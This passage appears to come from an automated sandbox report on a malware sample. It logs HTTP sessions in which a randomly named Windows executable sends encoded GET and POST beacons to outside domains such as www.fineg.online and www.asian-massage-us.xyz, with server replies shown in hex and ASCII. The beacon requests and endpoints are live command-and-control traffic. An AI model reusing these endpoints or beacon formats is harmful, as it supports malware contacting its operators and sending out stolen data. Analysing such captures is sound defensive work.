                      Data Raw: 54 4a 59 38 3d 7a 38 70 7a 69 31 77 49 43 6b 4a 55 6f 57 34 4f 6d 69 4a 35 32 44 31 37 41 7a 4f 57 64 71 4d 6b 50 76 64 44 73 34 73 78 64 61 71 77 76 31 53 6f 4a 65 72 39 79 48 43 57 58 76 41 4d 32 75 64 6f 45 6a 77 42 64 34 73 69 65 59 6d 44 34 50 53 32 33 31 64 35 6f 67 42 7a 75 61 73 6c 39 6b 4d 79 59 72 49 64 47 36 75 74 6b 70 58 61 76 56 55 6a 47 58 76 72 2b 6d 33 72 59 6f 7a 54 35 34 65 6a 65 6b 2f 68 4d 70 55 4c 6a 34 4b 2f 54 6c 51 49 51 6f 52 6e 55 4a 6c 79 79 54 48 78 63 49 30 6b 4a 35 62 41 35 5a 7a 42 50 66 65 35 72 6e 6f 73 4d 58 6d 76 66 57 44 45 55 2b 6b 69 74 71 58 4c 62 68 4c 72 59 72 4f 63 76 43 36 39 48 4b 44 4f 74 39 6e 32 61 65 69 74 55 67 64 45 43 6e 73 37 38 36 35 7a 36 59 57 78 74 78 35 35 48 76 74 79 44 77 34 4d 59 35 5a 35 54 6f 37 4c 2b 50 6b 45 4f 56 2b 6d 61 6f 57 78 37 54 32 4e 4d 74 75 4a 49 6f 69 42 42 66 70 6d 68 31 77 6b 70 6e 33 43 38 38 37 45 74 45 71 30 6c 70 67 74 36 44 52 37 68 72 35 47 72 4f 39 6d 4a 39 43 53 68 53 45 67 54 7a 66 6b 2f 67 42 45 6a 47 43 79 63 [TRUNCATED]
                      Data Ascii: TJY8= [TRUNCATED]
                      Sep 3, 2024 12:47:05.845719099 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 03 Sep 2024 10:47:05 GMT
                      Server: Apache
                      Content-Length: 18121
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                      Sep 3, 2024 12:47:05.845751047 CEST | 1236 | IN | Data Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                      Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                      Sep 3, 2024 12:47:05.845762014 CEST | 1236 | IN | Data Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                      Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                      Sep 3, 2024 12:47:05.845778942 CEST | 1236 | IN | Data Raw: 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 32 39 2e 38
                      Data Ascii: ath class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                      Sep 3, 2024 12:47:05.845788956 CEST | 1236 | IN | Data Raw: 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 36 30 20 32 38 32 2e 34 68 2d 33 6c 2d
                      Data Ascii: ss="st2" d="M870 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M860 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M850 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M840 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M830 282.4h
                      Sep 3, 2024 12:47:05.845802069 CEST | 1236 | IN | Data Raw: 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 36 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63
                      Data Ascii: -6.8 25.2h3z"/> <path class="st2" d="M640 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M630 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M620 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M610 282.4h-3l-6.8 25.2h3z"/> <pa
                      Sep 3, 2024 12:47:05.845813990 CEST | 1236 | IN | Data Raw: 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 37 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                      Data Ascii: /> <path class="st2" d="M-370.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-360.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-350.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-340.2 282.4h-3l-6.8 25.2h3z"/>
                      Sep 3, 2024 12:47:05.845828056 CEST | 108 | IN | Data Raw: 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 36 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33
                      Data Ascii: 2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-160.2 282.4h-3l-6.8 25.2h3z"/> <path class="st
                      Sep 3, 2024 12:47:05.845837116 CEST | 1236 | IN | Data Raw: 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 34 30 2e 32 20 32 38 32 2e 34 68 2d 33
                      Data Ascii: 2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                      Sep 3, 2024 12:47:05.845841885 CEST | 224 | IN | Data Raw: 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                      Data Ascii: d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="s
                      Sep 3, 2024 12:47:05.850970030 CEST | 1236 | IN | Data Raw: 74 32 22 20 64 3d 22 4d 34 31 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38
                      Data Ascii: t2" d="M410 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M400 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M390 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M380 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M370 282


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      12 | 192.168.2.4 | 49753 | 162.0.239.141 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:47:07.757998943 CEST | 452 | OUT | GET /mkan/?TJY8=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&3L7=cfJLLBshpRPDzp HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Language: en-us
                      Connection: close
                      Host: www.fineg.online
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Sep 3, 2024 12:47:08.341888905 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 03 Sep 2024 10:47:08 GMT
                      Server: Apache
                      Content-Length: 18121
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                      Sep 3, 2024 12:47:08.341905117 CEST | 1236 | IN | Data Raw: 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20
                      Data Ascii: .2s54.7-28 117.5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d=
                      Sep 3, 2024 12:47:08.341914892 CEST | 1236 | IN | Data Raw: 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38
                      Data Ascii: class="st2" d="M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d=
                      Sep 3, 2024 12:47:08.341924906 CEST | 1236 | IN | Data Raw: 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d
                      Data Ascii: .2h3z"/> <path class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <p
                      Sep 3, 2024 12:47:08.341936111 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22
                      Data Ascii: > <path class="st2" d="M870 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M860 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M850 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M840 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                      Sep 3, 2024 12:47:08.341979980 CEST | 1236 | IN | Data Raw: 22 4d 36 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 36 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a
                      Data Ascii: "M650 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M640 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M630 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M620 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M610 282.4h-3l-6.8 25.
                      Sep 3, 2024 12:47:08.341991901 CEST | 776 | IN | Data Raw: 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 37 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20
                      Data Ascii: 3l-6.8 25.2h3z"/> <path class="st2" d="M-370.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-360.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-350.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-340.2 282.4h-3l-
                      Sep 3, 2024 12:47:08.342001915 CEST | 1236 | IN | Data Raw: 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 34 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a
                      Data Ascii: .4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-240.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-230.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h
                      Sep 3, 2024 12:47:08.342011929 CEST | 1236 | IN | Data Raw: 73 74 32 22 20 64 3d 22 4d 2d 34 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 30 2e 32 20 32 38 32 2e 34 68 2d 33
                      Data Ascii: st2" d="M-40.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-30.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-20.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-10.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d=
                      Sep 3, 2024 12:47:08.342021942 CEST | 1236 | IN | Data Raw: 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 33 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d
                      Data Ascii: h3z"/> <path class="st2" d="M330 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M320 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M310 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M300 282.4h-3l-6.8 25.2h3z"/> <p
                      Sep 3, 2024 12:47:08.347678900 CEST | 1236 | IN | Data Raw: 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 31 31 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a
                      Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M110 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M100 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M90 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M80 282.4h-3l-6.8 25.


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      13 | 192.168.2.4 | 49754 | 199.59.243.226 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:47:13.681910038 CEST | 738 | OUT | POST /kc69/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.asian-massage-us.xyz
                      Origin: http://www.asian-massage-us.xyz
                      Referer: http://www.asian-massage-us.xyz/kc69/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 41 6b 42 6c 30 78 4e 53 47 6b 76 6b 2b 43 68 30 6d 4f 64 71 70 36 63 48 54 6b 46 66 7a 57 36 69 6d 30 78 6a 73 67 47 6c 44 32 50 79 46 2b 75 4b 59 6d 74 73 5a 52 31 78 2f 6d 64 2b 71 46 48 6d 56 31 2f 68 48 6d 5a 38 76 4d 54 54 2f 4c 4b 61 62 6a 2b 64 51 62 7a 42 6a 66 6d 34 4d 32 6a 59 35 34 77 38 58 48 52 36 62 33 77 79 77 61 30 75 6f 2b 37 6f 38 4b 4b 39 65 35 48 47 68 61 63 39 56 37 76 68 30 51 44 4a 79 2b 45 52 5a 73 32 59 31 63 54 6b 66 45 34 66 38 42 41 64 43 6b 77 5a 48 61 5a 62 35 62 76 34 50 6b 33 78 2b 51 68 50 62 58 2f 2b 4a 57 35 77 45 34 56 76 74 56 42 6e 63 51 3d 3d
                      Data Ascii: TJY8=AkBl0xNSGkvk+Ch0mOdqp6cHTkFfzW6im0xjsgGlD2PyF+uKYmtsZR1x/md+qFHmV1/hHmZ8vMTT/LKabj+dQbzBjfm4M2jY54w8XHR6b3wywa0uo+7o8KK9e5HGhac9V7vh0QDJy+ERZs2Y1cTkfE4f8BAdCkwZHaZb5bv4Pk3x+QhPbX/+JW5wE4VvtVBncQ==
                      Sep 3, 2024 12:47:14.122888088 CEST | 1236 | IN | HTTP/1.1 200 OK
                      date: Tue, 03 Sep 2024 10:47:14 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1146
                      x-request-id: 18dc0cc8-f883-491b-b69d-5b705b40ee5e
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==
                      set-cookie: parking_session=18dc0cc8-f883-491b-b69d-5b705b40ee5e; expires=Tue, 03 Sep 2024 11:02:14 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6c 41 52 4a 68 71 4c 6d 6d 57 56 48 38 62 2f 47 44 49 68 77 7a 4a 7a 64 6e 34 35 6b 66 74 33 6b 36 4f 65 2f 47 75 32 2f 41 4c 62 6d 32 38 66 32 4c 59 73 72 44 4e 75 50 68 66 30 74 35 66 34 39 39 75 47 30 44 50 5a 55 4a 73 6f 43 49 79 30 4d 68 6a 5a 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 3, 2024 12:47:14.122904062 CEST | 599 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
